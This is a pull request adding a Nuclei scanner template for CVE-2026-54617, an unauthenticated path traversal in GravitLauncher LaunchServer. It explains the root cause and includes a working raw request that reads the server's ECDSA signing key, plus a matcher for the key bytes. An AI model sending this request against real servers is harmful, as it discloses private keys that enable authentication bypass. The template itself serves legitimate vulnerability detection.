### PR TITLE
Add CVE-2026-54617 template

### DIFF
--- a/http/cves/2026/CVE-2026-54617.yaml
+++ b/http/cves/2026/CVE-2026-54617.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-54617
+
+info:
+  name: GravitLauncher LaunchServer <=5.7.11 - Unauthenticated Path Traversal to Arbitrary File Read (ECDSA Signing Key Disclosure)
+  author: str4k3r
+  severity: critical
+  description: |
+    LaunchServer's Netty FileServerHandler (FileServerHandler.channelRead0)
+    computes the served path as
+    Paths.get(IOHelper.getPathFromUrlFragment(uri)).normalize().toString().substring(1),
+    which blindly strips one leading character on the assumption that every
+    request-target begins with '/'. Netty's HttpServerCodec accepts a
+    request-target without a leading slash verbatim, so for such a target
+    normalize() cannot collapse the leading ".." and substring(1) merely
+    turns "../" into "./" while the remaining ".." survives; base.resolve(path)
+    is never re-normalized afterwards, so the resolved path escapes the
+    updatesDir. The file server is enabled by default
+    (netty.fileServerEnabled=true) on 0.0.0.0:9274 with no authentication in
+    front of it, so an unauthenticated remote GET without a leading slash in
+    the request line reads any file readable by the LaunchServer process --
+    including its own ECDSA signing key (.keys/ecdsa_id), which signs access
+    JWTs and therefore enables full authentication bypass for any account.
+  reference:
+    - https://github.com/GravitLauncher/Launcher/security/advisories/GHSA-5g75-477j-2c2f
+    - https://github.com/GravitLauncher/Launcher/commit/1e0b3a3
+  classification:
+    cve-id: CVE-2026-54617
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: gravitlauncher
+    product: launchserver
+    technology: Java, Netty, GravitLauncher LaunchServer (Minecraft custom-launcher backend)
+  tags: cve,cve2026,gravitlauncher,launchserver,path-traversal,unauth,kev
+
+http:
+  - raw:
+      - |+
+        GET ../../.keys/ecdsa_id HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: binary
+        part: body
+        binary:
+          - "3041020100301306072a8648ce3d020106082a8648ce3d0301070427302502010104"


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-54617, an unauthenticated path traversal in
GravitLauncher LaunchServer's Netty file server.

## Detection

The file-server handler assumes every request target begins with `/` and
strips the first character after path normalization. A request target without
that leading slash therefore escapes the configured update directory. The
template sends one raw, unauthenticated request for `../../.keys/ecdsa_id` and
matches the characteristic P-256 PKCS#8 private-key prefix in the response.

The request is intentionally read-only and does not create, modify, or delete
any application resource. A normal leading-slash control request does not
match, preventing a generic file-server response from being reported.

## Validation

- Vulnerable official LaunchServer 5.7.11 release: `DETECTED` 3/3
- Fixed official LaunchServer 5.7.12 release: `NOT_DETECTED` 3/3
- Native Nuclei v3.11.0 template validation: passed
- V/F applications ran from official GitHub release assets under a stock
  Eclipse Temurin JRE container with default first-boot configuration

## References

- https://github.com/GravitLauncher/Launcher/security/advisories/GHSA-5g75-477j-2c2f
- https://github.com/GravitLauncher/Launcher/commit/1e0b3a3